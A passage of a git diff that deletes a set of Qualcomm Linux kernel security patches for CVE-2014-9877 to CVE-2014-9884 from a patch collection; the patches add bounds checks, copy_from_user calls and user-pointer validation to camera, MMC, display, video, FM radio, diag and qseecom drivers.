- 	int32_t dest_step_position = move_params->dest_step_pos;
-+	struct damping_params_t ringing_params_kernel;
- 	int32_t rc = 0;
- 	int32_t num_steps = move_params->num_steps;
- 	struct msm_camera_i2c_reg_setting reg_setting;
- 	CDBG("Enter\n");
- 
-+	if (copy_from_user(&ringing_params_kernel,
-+		&(move_params->ringing_params[0]),
-+		sizeof(struct damping_params_t))) {
-+		pr_err("copy_from_user failed\n");
-+		return -EFAULT;
-+	}
-+
- 	if (num_steps == 0)
- 		return rc;
- 
-@@ -208,7 +216,7 @@ static int32_t msm_actuator_piezo_move_focus(
- 	a_ctrl->func_tbl->actuator_parse_i2c_params(a_ctrl,
- 		(num_steps *
- 		a_ctrl->region_params[0].code_per_step),
--		move_params->ringing_params[0].hw_params, 0);
-+		ringing_params_kernel.hw_params, 0);
- 
- 	reg_setting.reg_setting = a_ctrl->i2c_reg_tbl;
- 	reg_setting.data_type = a_ctrl->i2c_data_type;
-@@ -230,6 +238,7 @@ static int32_t msm_actuator_move_focus(
- 	struct msm_actuator_move_params_t *move_params)
- {
- 	int32_t rc = 0;
-+	struct damping_params_t ringing_params_kernel;
- 	int8_t sign_dir = move_params->sign_dir;
- 	uint16_t step_boundary = 0;
- 	uint16_t target_step_pos = 0;
-@@ -240,6 +249,14 @@ static int32_t msm_actuator_move_focus(
- 	int32_t num_steps = move_params->num_steps;
- 	struct msm_camera_i2c_reg_setting reg_setting;
- 
-+	if (copy_from_user(&ringing_params_kernel,
-+		&(move_params->ringing_params[a_ctrl->curr_region_index]),
-+		sizeof(struct damping_params_t))) {
-+		pr_err("copy_from_user failed\n");
-+		return -EFAULT;
-+	}
-+
-+
- 	CDBG("called, dir %d, num_steps %d\n", dir, num_steps);
- 
- 	if (dest_step_pos == a_ctrl->curr_step_pos)
-@@ -276,9 +293,7 @@ static int32_t msm_actuator_move_focus(
- 				a_ctrl->step_position_table[target_step_pos];
- 			a_ctrl->func_tbl->actuator_write_focus(a_ctrl,
- 					curr_lens_pos,
--					&(move_params->
--						ringing_params[a_ctrl->
--						curr_region_index]),
-+					&ringing_params_kernel,
- 					sign_dir,
- 					target_lens_pos);
- 			curr_lens_pos = target_lens_pos;
-@@ -289,8 +304,7 @@ static int32_t msm_actuator_move_focus(
- 				a_ctrl->step_position_table[target_step_pos];
- 			a_ctrl->func_tbl->actuator_write_focus(a_ctrl,
- 					curr_lens_pos,
--					&(move_params->ringing_params[a_ctrl->
--						curr_region_index]),
-+					&ringing_params_kernel,
- 					sign_dir,
- 					target_lens_pos);
- 			curr_lens_pos = target_lens_pos;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9878/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9878/ANY/0001.patch
deleted file mode 100644
index f370db93..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9878/ANY/0001.patch
+++ /dev/null
@@ -1,103 +0,0 @@
-From 96a62c1de93a44e6ca69514411baf4b3d67f6dee Mon Sep 17 00:00:00 2001
-From: Lee Susman <lsusman@codeaurora.org>
-Date: Mon, 11 Nov 2013 08:53:40 +0200
-Subject: mmc: card: fix arbitrary write via read handler in mmc_block_test
-
-In mmc_block_test, the debug_fs based read function handlers write to an
-arbitrary buffer which is given by any user. We add an access_ok check
-to verify that the address pointed by *buffer is not in kernel space.
-Only if the buffer is valid, do we continue the read handler.
-
-Change-Id: I35fe9bb70df8de92cb4d3b15c851aa9131a0e8d9
-Signed-off-by: Lee Susman <lsusman@codeaurora.org>
----
- drivers/mmc/card/mmc_block_test.c | 24 ++++++++++++++++++++++++
- 1 file changed, 24 insertions(+)
-
-diff --git a/drivers/mmc/card/mmc_block_test.c b/drivers/mmc/card/mmc_block_test.c
-index ea73352..b24c367 100644
---- a/drivers/mmc/card/mmc_block_test.c
-+++ b/drivers/mmc/card/mmc_block_test.c
-@@ -2219,6 +2219,9 @@ static ssize_t send_write_packing_test_read(struct file *file,
- 			       size_t count,
- 			       loff_t *offset)
- {
-+	if (!access_ok(VERIFY_WRITE, buffer, count))
-+		return count;
-+
- 	memset((void *)buffer, 0, count);
- 
- 	snprintf(buffer, count,
-@@ -2317,6 +2320,9 @@ static ssize_t err_check_test_read(struct file *file,
- 			       size_t count,
- 			       loff_t *offset)
- {
-+	if (!access_ok(VERIFY_WRITE, buffer, count))
-+		return count;
-+
- 	memset((void *)buffer, 0, count);
- 
- 	snprintf(buffer, count,
-@@ -2425,6 +2431,9 @@ static ssize_t send_invalid_packed_test_read(struct file *file,
- 			       size_t count,
- 			       loff_t *offset)
- {
-+	if (!access_ok(VERIFY_WRITE, buffer, count))
-+		return count;
-+
- 	memset((void *)buffer, 0, count);
- 
- 	snprintf(buffer, count,
-@@ -2539,6 +2548,9 @@ static ssize_t write_packing_control_test_read(struct file *file,
- 			       size_t count,
- 			       loff_t *offset)
- {
-+	if (!access_ok(VERIFY_WRITE, buffer, count))
-+		return count;
-+
- 	memset((void *)buffer, 0, count);
- 
- 	snprintf(buffer, count,
-@@ -2621,6 +2633,9 @@ static ssize_t bkops_test_read(struct file *file,
- 			       size_t count,
- 			       loff_t *offset)
- {
-+	if (!access_ok(VERIFY_WRITE, buffer, count))
-+		return count;
-+
- 	memset((void *)buffer, 0, count);
- 
- 	snprintf(buffer, count,
-@@ -2709,6 +2724,9 @@ static ssize_t long_sequential_read_test_read(struct file *file,
- 			       size_t count,
- 			       loff_t *offset)
- {
-+	if (!access_ok(VERIFY_WRITE, buffer, count))
-+		return count;
-+
- 	memset((void *)buffer, 0, count);
- 
- 	snprintf(buffer, count,
-@@ -2869,6 +2887,9 @@ static ssize_t long_sequential_write_test_read(struct file *file,
- 			       size_t count,
- 			       loff_t *offset)
- {
-+	if (!access_ok(VERIFY_WRITE, buffer, count))
-+		return count;
-+
- 	memset((void *)buffer, 0, count);
- 
- 	snprintf(buffer, count,
-@@ -2942,6 +2963,9 @@ static ssize_t new_req_notification_test_read(struct file *file,
- 			       size_t count,
- 			       loff_t *offset)
- {
-+	if (!access_ok(VERIFY_WRITE, buffer, count))
-+		return count;
-+
- 	memset((void *)buffer, 0, count);
- 
- 	snprintf(buffer, count,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9879/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9879/ANY/0001.patch
deleted file mode 100644
index 23bf2885..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9879/ANY/0001.patch
+++ /dev/null
@@ -1,155 +0,0 @@
-From ecc8116e1befb3a764109f47ba0389434ddabbe4 Mon Sep 17 00:00:00 2001
-From: Terence Hampson <thampson@codeaurora.org>
-Date: Wed, 7 Aug 2013 16:54:51 -0400
-Subject: mdss: mdp3: validate histogram data passed in
-
-Data passed in from userspace should be validated to be within
-the appropriate ranges.
-
-Change-Id: I50ff818a2b03c1fff55f44403f0f1b67c26d9f0e
-Signed-off-by: Terence Hampson <thampson@codeaurora.org>
----
- drivers/video/msm/mdss/mdp3_ctrl.c | 77 +++++++++++++++++++++++++++++++++++---
- drivers/video/msm/mdss/mdp3_dma.c  |  2 +-
- drivers/video/msm/mdss/mdp3_dma.h  |  6 +++
- 3 files changed, 79 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdp3_ctrl.c b/drivers/video/msm/mdss/mdp3_ctrl.c
-index 74e6983c..31aae26 100644
---- a/drivers/video/msm/mdss/mdp3_ctrl.c
-+++ b/drivers/video/msm/mdss/mdp3_ctrl.c
-@@ -775,6 +775,64 @@ static int mdp3_get_metadata(struct msm_fb_data_type *mfd,
- 	return ret;
- }
- 
-+int mdp3_validate_start_req(struct mdp_histogram_start_req *req)
-+{
-+	if (req->frame_cnt >= MDP_HISTOGRAM_FRAME_COUNT_MAX) {
-+		pr_err("%s invalid req frame_cnt\n", __func__);
-+		return -EINVAL;
-+	}
-+	if (req->bit_mask >= MDP_HISTOGRAM_BIT_MASK_MAX) {
-+		pr_err("%s invalid req bit mask\n", __func__);
-+		return -EINVAL;
-+	}
-+	if (req->block != MDP_BLOCK_DMA_P ||
-+		req->num_bins != MDP_HISTOGRAM_BIN_NUM) {
-+		pr_err("mdp3_histogram_start invalid request\n");
-+		return -EINVAL;
-+	}
-+	return 0;
-+}
-+
-+int mdp3_validate_scale_config(struct mdp_bl_scale_data *data)
-+{
-+	if (data->scale > MDP_HISTOGRAM_BL_SCALE_MAX) {
-+		pr_err("%s invalid bl_scale\n", __func__);
-+		return -EINVAL;
-+	}
-+	if (data->min_lvl > MDP_HISTOGRAM_BL_LEVEL_MAX) {
-+		pr_err("%s invalid bl_min_lvl\n", __func__);
-+		return -EINVAL;
-+	}
-+	return 0;
-+}
-+
-+int mdp3_validate_csc_data(struct mdp_csc_cfg_data *data)
-+{
-+	int i;
-+	for (i = 0; i < 9; i++) {
-+		if (data->csc_data.csc_mv[i] >=
-+				MDP_HISTOGRAM_CSC_MATRIX_MAX)
-+			return -EINVAL;
-+	}
-+	for (i = 0; i < 3; i++) {
-+		if (data->csc_data.csc_pre_bv[i] >=
-+				MDP_HISTOGRAM_CSC_VECTOR_MAX)
-+			return -EINVAL;
-+		if (data->csc_data.csc_post_bv[i] >=
-+				MDP_HISTOGRAM_CSC_VECTOR_MAX)
-+			return -EINVAL;
-+	}
-+	for (i = 0; i < 6; i++) {
-+		if (data->csc_data.csc_pre_lv[i] >=
-+				MDP_HISTOGRAM_CSC_VECTOR_MAX)
-+			return -EINVAL;
-+		if (data->csc_data.csc_post_lv[i] >=
-+				MDP_HISTOGRAM_CSC_VECTOR_MAX)
-+			return -EINVAL;
-+	}
-+	return 0;
-+}
-+
- static int mdp3_histogram_start(struct mdp3_session_data *session,
- 					struct mdp_histogram_start_req *req)
- {
-@@ -782,11 +840,10 @@ static int mdp3_histogram_start(struct mdp3_session_data *session,
- 	struct mdp3_dma_histogram_config histo_config;
- 
- 	pr_debug("mdp3_histogram_start\n");
--	if (req->block != MDP_BLOCK_DMA_P ||
--		req->num_bins != MDP_HISTOGRAM_BIN_NUM) {
--		pr_err("mdp3_histogram_start invalid request\n");
--		return -EINVAL;
--	}
-+
-+	ret = mdp3_validate_start_req(req);
-+	if (ret)
-+		return ret;
- 
- 	if (!session->dma->histo_op ||
- 		!session->dma->config_histo) {
-@@ -986,10 +1043,20 @@ static int mdp3_pp_ioctl(struct msm_fb_data_type *mfd,
- 
- 	switch (mdp_pp.op) {
- 	case mdp_bl_scale_cfg:
-+		ret = mdp3_validate_scale_config(&mdp_pp.data.bl_scale_data);
-+		if (ret) {
-+			pr_err("%s: invalid scale config\n", __func__);
-+			break;
-+		}
- 		ret = mdp3_bl_scale_config(mfd, (struct mdp_bl_scale_data *)
- 						&mdp_pp.data.bl_scale_data);
- 		break;
- 	case mdp_op_csc_cfg:
-+		ret = mdp3_validate_csc_data(&(mdp_pp.data.csc_cfg_data));
-+		if (ret) {
-+			pr_err("%s: invalid csc data\n", __func__);
-+			break;
-+		}
- 		ret = mdp3_csc_config(mdp3_session,
- 						&(mdp_pp.data.csc_cfg_data));
- 		break;
-diff --git a/drivers/video/msm/mdss/mdp3_dma.c b/drivers/video/msm/mdss/mdp3_dma.c
-index 3e1bf5d..d3f1538 100644
---- a/drivers/video/msm/mdss/mdp3_dma.c
-+++ b/drivers/video/msm/mdss/mdp3_dma.c
-@@ -497,7 +497,7 @@ static int mdp3_dmap_histo_config(struct mdp3_dma *dma,
- 			struct mdp3_dma_histogram_config *histo_config)
- {
- 	unsigned long flag;
--	u32 histo_bit_mask, histo_control;
-+	u32 histo_bit_mask = 0, histo_control = 0;
- 	u32 histo_isr_mask = MDP3_DMA_P_HIST_INTR_HIST_DONE_BIT |
- 			MDP3_DMA_P_HIST_INTR_RESET_DONE_BIT;
- 
-diff --git a/drivers/video/msm/mdss/mdp3_dma.h b/drivers/video/msm/mdss/mdp3_dma.h
-index e4a28dc..7dd6ba7 100644
---- a/drivers/video/msm/mdss/mdp3_dma.h
-+++ b/drivers/video/msm/mdss/mdp3_dma.h
-@@ -16,6 +16,12 @@
- 
- #include <linux/sched.h>
- 
-+#define MDP_HISTOGRAM_BL_SCALE_MAX 1024
-+#define MDP_HISTOGRAM_BL_LEVEL_MAX 255
-+#define MDP_HISTOGRAM_FRAME_COUNT_MAX 0x20
-+#define MDP_HISTOGRAM_BIT_MASK_MAX 0x4
-+#define MDP_HISTOGRAM_CSC_MATRIX_MAX 0x2000
-+#define MDP_HISTOGRAM_CSC_VECTOR_MAX 0x200
- #define MDP_HISTOGRAM_BIN_NUM	32
- #define MDP_LUT_SIZE 256
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9880/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9880/ANY/0001.patch
deleted file mode 100644
index 800fe67c..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9880/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From f2a3f5e63e15e97a66e8f5a300457378bcb89d9c Mon Sep 17 00:00:00 2001
-From: Deepak Verma <dverma@codeaurora.org>
-Date: Mon, 21 Oct 2013 17:37:11 +0530
-Subject: msm: vidc: Check validity of userspace address
-
-Before writing to a userspace address, verification
-of the validity of user space address is required.
-
-Change-Id: I9141e44a6c11aaf3f4d57c08bb0dd26a7b214f34
-CRs-fixed: 556356
-Signed-off-by: Deepak Verma <dverma@codeaurora.org>
----
- drivers/video/msm/vidc/common/enc/venc.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/video/msm/vidc/common/enc/venc.c b/drivers/video/msm/vidc/common/enc/venc.c
-index 1801461..707d948 100644
---- a/drivers/video/msm/vidc/common/enc/venc.c
-+++ b/drivers/video/msm/vidc/common/enc/venc.c
-@@ -1414,6 +1414,12 @@ static long vid_enc_ioctl(struct file *file,
- 			return -EFAULT;
- 
- 		DBG("VEN_IOCTL_GET_SEQUENCE_HDR\n");
-+		if (!access_ok(VERIFY_WRITE, seq_header.hdrbufptr,
-+			seq_header.bufsize)) {
-+			ERR("VEN_IOCTL_GET_SEQUENCE_HDR:"\
-+				" Userspace address verification failed.\n");
-+			return -EFAULT;
-+		}
- 		result = vid_enc_get_sequence_header(client_ctx,
- 				&seq_header);
- 		if (!result) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9881/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9881/ANY/0001.patch
deleted file mode 100644
index 62ba9399..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9881/ANY/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From ba3f404a10b3bb7e9c20440837df3cd35c5d0c4b Mon Sep 17 00:00:00 2001
-From: Ayaz Ahmad <aahmad@codeaurora.org>
-Date: Thu, 31 Oct 2013 19:08:05 +0530
-Subject: radio: iris: Prevent probable overflow
-
-casting a unsigned int into an integer, integer to
-unsigned int may cause buffer overflow.
-
-Change-Id: I54be4d4c5470616a59a772c587fe6d5f32575c32
-CRs-Fixed: 539008
-Signed-off-by: Ayaz Ahmad <aahmad@codeaurora.org>
----
- drivers/media/radio/radio-iris.c | 14 ++++++++++----
- 1 file changed, 10 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/radio/radio-iris.c b/drivers/media/radio/radio-iris.c
-index bfb1088..12fd7cf 100644
---- a/drivers/media/radio/radio-iris.c
-+++ b/drivers/media/radio/radio-iris.c
-@@ -3032,7 +3032,7 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv,
- 			struct v4l2_ext_controls *ctrl)
- {
- 	int retval = 0;
--	int bytes_to_copy;
-+	size_t bytes_to_copy;
- 	struct hci_fm_tx_ps tx_ps;
- 	struct hci_fm_tx_rt tx_rt;
- 	struct hci_fm_def_data_wr_req default_data;
-@@ -3041,14 +3041,20 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv,
- 	struct iris_device *radio = video_get_drvdata(video_devdata(file));
- 	char *data = NULL;
- 
-+	if ((ctrl == NULL) || (ctrl->controls == NULL)
-+		|| (ctrl->count == 0)) {
-+		retval = -EINVAL;
-+		return retval;
-+	}
-+
- 	switch ((ctrl->controls[0]).id) {
- 	case V4L2_CID_RDS_TX_PS_NAME:
- 		FMDBG("In V4L2_CID_RDS_TX_PS_NAME\n");
- 		/*Pass a sample PS string */
- 
- 		memset(tx_ps.ps_data, 0, MAX_PS_LENGTH);
--		bytes_to_copy = min((int)(ctrl->controls[0]).size,
--			MAX_PS_LENGTH);
-+		bytes_to_copy = min_t(size_t, ctrl->controls[0].size,
-+					MAX_PS_LENGTH);
- 		data = (ctrl->controls[0]).string;
- 
- 		if (copy_from_user(tx_ps.ps_data,
-@@ -3065,7 +3071,7 @@ static int iris_vidioc_s_ext_ctrls(struct file *file, void *priv,
- 		break;
- 	case V4L2_CID_RDS_TX_RADIO_TEXT:
- 		bytes_to_copy =
--		    min((int)(ctrl->controls[0]).size, MAX_RT_LENGTH);
-+		    min_t(size_t, (ctrl->controls[0]).size, MAX_RT_LENGTH);
- 		data = (ctrl->controls[0]).string;
- 
- 		memset(tx_rt.rt_data, 0, MAX_RT_LENGTH);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9882/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9882/ANY/0001.patch
deleted file mode 100644
index 23829e98..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9882/ANY/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From 3a4ebaac557a9e3fbcbab4561650abac8298a4d9 Mon Sep 17 00:00:00 2001
-From: Satish Kodishala <skodisha@codeaurora.org>
-Date: Thu, 10 Oct 2013 15:44:11 +0530
-Subject: radio: iris: Checking if driver's buffer is large enough.
-
-Checking if driver's buffer is large enough to copy
-the data from user space.
-
-Change-Id: I7b4eed81cf77ce2973669ce18ccd95a5df397d82
-CRs-fixed: 552329
-Signed-off-by: Satish Kodishala <skodisha@codeaurora.org>
----
- drivers/media/radio/radio-iris.c | 23 ++++++++++++++++++-----
- 1 file changed, 18 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/radio/radio-iris.c b/drivers/media/radio/radio-iris.c
-index 5e056be..a9e25bd 100644
---- a/drivers/media/radio/radio-iris.c
-+++ b/drivers/media/radio/radio-iris.c
-@@ -3472,13 +3472,26 @@ static int iris_vidioc_s_ctrl(struct file *file, void *priv,
- 		radio->riva_data_req.cmd_params.start_addr = ctrl->value;
- 		break;
- 	case V4L2_CID_PRIVATE_IRIS_RIVA_ACCS_LEN:
--		radio->riva_data_req.cmd_params.length = ctrl->value;
-+		if ((ctrl->value > 0) &&
-+			(ctrl->value <= MAX_RIVA_PEEK_RSP_SIZE)) {
-+			radio->riva_data_req.cmd_params.length = ctrl->value;
-+		} else {
-+			FMDERR("Length %d is more than the buffer size %d\n",
-+			ctrl->value, MAX_RIVA_PEEK_RSP_SIZE);
-+			retval = -EINVAL;
-+		}
- 		break;
- 	case V4L2_CID_PRIVATE_IRIS_RIVA_POKE:
--		memcpy(radio->riva_data_req.data, (void *)ctrl->value,
--					radio->riva_data_req.cmd_params.length);
--		radio->riva_data_req.cmd_params.subopcode = RIVA_POKE_OPCODE;
--		retval = hci_poke_data(&radio->riva_data_req , radio->fm_hdev);
-+		if (radio->riva_data_req.cmd_params.length <= MAX_RIVA_PEEK_RSP_SIZE) {
-+			memcpy(radio->riva_data_req.data, (void *)ctrl->value,
-+						radio->riva_data_req.cmd_params.length);
-+			radio->riva_data_req.cmd_params.subopcode = RIVA_POKE_OPCODE;
-+			retval = hci_poke_data(&radio->riva_data_req , radio->fm_hdev);
-+		} else {
-+			FMDERR("Can not copy into driver's buffer. Length %d is more than"
-+			 "the buffer size %d\n", ctrl->value, MAX_RIVA_PEEK_RSP_SIZE);
-+			retval = -EINVAL;
-+		}
- 		break;
- 	case V4L2_CID_PRIVATE_IRIS_SSBI_ACCS_ADDR:
- 		radio->ssbi_data_accs.start_addr = ctrl->value;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9882/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9882/ANY/0002.patch
deleted file mode 100644
index a9a0df43..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9882/ANY/0002.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 0f6afe815b1b3f920f3502be654c848bdfe5ef38 Mon Sep 17 00:00:00 2001
-From: Ayaz Ahmad <aahmad@codeaurora.org>
-Date: Tue, 8 Oct 2013 15:56:04 +0530
-Subject: radio: iris: Use kernel API to copy data from user space
-
-Use copy_from_user kernel api to copy any data from user space
-to kernel space.
-
-Change-Id: Ia3b7bb0f98180bd8792c1c18e930cb5609b8dc82
-CRs-Fixed: 540320
-Signed-off-by: Ayaz Ahmad <aahmad@codeaurora.org>
----
- drivers/media/radio/radio-iris.c | 16 ++++++++++++----
- 1 file changed, 12 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/radio/radio-iris.c b/drivers/media/radio/radio-iris.c
-index a554749..3bac006 100644
---- a/drivers/media/radio/radio-iris.c
-+++ b/drivers/media/radio/radio-iris.c
-@@ -3623,13 +3623,21 @@ static int iris_vidioc_s_ctrl(struct file *file, void *priv,
- 		break;
- 	case V4L2_CID_PRIVATE_IRIS_RIVA_POKE:
- 		if (radio->riva_data_req.cmd_params.length <= MAX_RIVA_PEEK_RSP_SIZE) {
--			memcpy(radio->riva_data_req.data, (void *)ctrl->value,
-+			retval = copy_from_user(radio->riva_data_req.data,
-+						(void *)ctrl->value,
- 						radio->riva_data_req.cmd_params.length);
--			radio->riva_data_req.cmd_params.subopcode = RIVA_POKE_OPCODE;
--			retval = hci_poke_data(&radio->riva_data_req , radio->fm_hdev);
-+			if (retval == 0) {
-+				radio->riva_data_req.cmd_params.subopcode =
-+									RIVA_POKE_OPCODE;
-+				retval = hci_poke_data(&radio->riva_data_req,
-+							radio->fm_hdev);
-+			} else {
-+				retval = -EINVAL;
-+			}
- 		} else {
- 			FMDERR("Can not copy into driver's buffer. Length %d is more than"
--			 "the buffer size %d\n", ctrl->value, MAX_RIVA_PEEK_RSP_SIZE);
-+			 "the buffer size %d\n", radio->riva_data_req.cmd_params.length,
-+				MAX_RIVA_PEEK_RSP_SIZE);
- 			retval = -EINVAL;
- 		}
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9883/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9883/ANY/0001.patch
deleted file mode 100644
index e062d8fc..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9883/ANY/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From cbf79a67348e48557c0d0bb9bc58391b3f84bc46 Mon Sep 17 00:00:00 2001
-From: Katish Paran <kparan@codeaurora.org>
-Date: Tue, 24 Dec 2013 14:11:41 +0530
-Subject: diag: dci: Safeguard to prevent integer overflow
-
-At certain point in diag driver there can be integer overflow
-thus can lead to memory leak. Added a safegaurd for it.
-
-Change-Id: I9347405d8f1f95ed42fe0abf35cbf4c362281bdf
-CRs-fixed: 565160
-Signed-off-by: Katish Paran <kparan@codeaurora.org>
----
- drivers/char/diag/diag_dci.c | 12 +++++++++---
- 1 file changed, 9 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/char/diag/diag_dci.c b/drivers/char/diag/diag_dci.c
-index 2dbb2f5..7772ebe 100644
---- a/drivers/char/diag/diag_dci.c
-+++ b/drivers/char/diag/diag_dci.c
-@@ -383,17 +383,23 @@ void extract_dci_events(unsigned char *buf)
- 
- void extract_dci_log(unsigned char *buf)
- {
--	uint16_t log_code, item_num;
-+	uint16_t log_code, item_num, log_length;
- 	uint8_t equip_id, *log_mask_ptr, byte_mask;
- 	unsigned int i, byte_index, byte_offset = 0;
- 	struct diag_dci_client_tbl *entry;
- 
-+	log_length = *(uint16_t *)(buf + 2);
- 	log_code = *(uint16_t *)(buf + 6);
- 	equip_id = LOG_GET_EQUIP_ID(log_code);
- 	item_num = LOG_GET_ITEM_NUM(log_code);
- 	byte_index = item_num/8 + 2;
- 	byte_mask = 0x01 << (item_num % 8);
- 
-+	if (log_length > USHRT_MAX - 4) {
-+		pr_err("diag: Integer overflow in %s, log_len:%d",
-+				__func__, log_length);
-+		return;
-+	}
- 	byte_offset = (equip_id * 514) + byte_index;
- 	if (byte_offset >=  DCI_LOG_MASK_SIZE) {
- 		pr_err("diag: Invalid byte_offset %d in dci log\n",
-@@ -430,8 +436,8 @@ void extract_dci_log(unsigned char *buf)
- 				*(int *)(entry->dci_data+entry->data_len) =
- 								DCI_LOG_TYPE;
- 				memcpy(entry->dci_data + entry->data_len + 4,
--					    buf + 4, *(uint16_t *)(buf + 2));
--				entry->data_len += 4 + *(uint16_t *)(buf + 2);
-+					    buf + 4, log_length);
-+				entry->data_len += 4 + log_length;
- 			}
- 			mutex_unlock(&entry->data_mutex);
- 			mutex_unlock(&dci_health_mutex);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9884/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9884/ANY/0001.patch
deleted file mode 100644
index a0d6afc1..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9884/ANY/0001.patch
+++ /dev/null
@@ -1,151 +0,0 @@
-From f4948193c46f75e16d4382c4472485ab12b7bd17 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Mon, 25 Nov 2013 13:05:35 -0800
-Subject: qseecom: Add checks for user space buffer pointers
-
-Validate pointers send from user space and pointers
-embedded within the mesasge sent from user space.
-
-Change-Id: I1be54924ef3d301908af6e8d4e6506f2aa7f6428
-Signed-off-by: Mona Hossain <mhossain@codeaurora.org>
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 61 +++++++++++++++++++++++++++++++++++++++++++++++++-
- 1 file changed, 60 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 0bc18fb..c5c0ce8 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -99,7 +99,7 @@ static DEFINE_MUTEX(clk_access_lock);
- struct qseecom_registered_listener_list {
- 	struct list_head                 list;
- 	struct qseecom_register_listener_req svc;
--	u8  *sb_reg_req;
-+	uint32_t user_virt_sb_base;
- 	u8 *sb_virt;
- 	s32 sb_phys;
- 	size_t sb_length;
-@@ -319,6 +319,10 @@ static int qseecom_register_listener(struct qseecom_dev_handle *data,
- 		pr_err("copy_from_user failed\n");
- 		return ret;
- 	}
-+	if (!access_ok(VERIFY_WRITE, (void __user *)rcvd_lstnr.virt_sb_base,
-+			rcvd_lstnr.sb_size))
-+		return -EFAULT;
-+
- 	data->listener.id = 0;
- 	if (!__qseecom_is_svc_unique(data, &rcvd_lstnr)) {
- 		pr_err("Service is not unique and is already registered\n");
-@@ -336,6 +340,7 @@ static int qseecom_register_listener(struct qseecom_dev_handle *data,
- 
- 	new_entry->svc.listener_id = rcvd_lstnr.listener_id;
- 	new_entry->sb_length = rcvd_lstnr.sb_size;
-+	new_entry->user_virt_sb_base = rcvd_lstnr.virt_sb_base;
- 	if (__qseecom_set_sb_memory(new_entry, data, &rcvd_lstnr)) {
- 		pr_err("qseecom_set_sb_memoryfailed\n");
- 		kzfree(new_entry);
-@@ -446,6 +451,10 @@ static int qseecom_set_client_mem_param(struct qseecom_dev_handle *data,
- 			req.ifd_data_fd, req.sb_len, req.virt_sb_base);
- 		return -EFAULT;
- 	}
-+	if (!access_ok(VERIFY_WRITE, (void __user *)req.virt_sb_base,
-+			req.sb_len))
-+		return -EFAULT;
-+
- 	/* Get the handle of the shared fd */
- 	data->client.ihandle = ion_import_dma_buf(qseecom.ion_clnt,
- 						req.ifd_data_fd);
-@@ -861,6 +870,13 @@ static uint32_t __qseecom_uvirt_to_kphys(struct qseecom_dev_handle *data,
- 	return data->client.sb_phys + (virt - data->client.user_virt_sb_base);
- }
- 
-+static uint32_t __qseecom_uvirt_to_kvirt(struct qseecom_dev_handle *data,
-+						uint32_t virt)
-+{
-+	return (uint32_t)data->client.sb_virt +
-+				(virt - data->client.user_virt_sb_base);
-+}
-+
- int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- 		struct qseecom_send_svc_cmd_req *req_ptr,
- 		struct qseecom_client_send_service_ireq *send_svc_ireq_ptr)
-@@ -1269,6 +1285,24 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- 		pr_err("copy_from_user failed\n");
- 		return ret;
- 	}
-+
-+	if (req.cmd_req_buf == NULL || req.resp_buf == NULL) {
-+		pr_err("cmd buffer or response buffer is null\n");
-+		return -EINVAL;
-+	}
-+	if (((uint32_t)req.cmd_req_buf < data->client.user_virt_sb_base) ||
-+		((uint32_t)req.cmd_req_buf >= (data->client.user_virt_sb_base +
-+					data->client.sb_length))) {
-+		pr_err("cmd buffer address not within shared bufffer\n");
-+		return -EINVAL;
-+	}
-+
-+	if (((uint32_t)req.resp_buf < data->client.user_virt_sb_base)  ||
-+		((uint32_t)req.resp_buf >= (data->client.user_virt_sb_base +
-+					data->client.sb_length))){
-+		pr_err("response buffer address not within shared bufffer\n");
-+		return -EINVAL;
-+	}
- 	send_cmd_req.cmd_req_buf = req.cmd_req_buf;
- 	send_cmd_req.cmd_req_len = req.cmd_req_len;
- 	send_cmd_req.resp_buf = req.resp_buf;
-@@ -1282,6 +1316,11 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- 			return -EINVAL;
- 		}
- 	}
-+	req.cmd_req_buf = (void *)__qseecom_uvirt_to_kvirt(data,
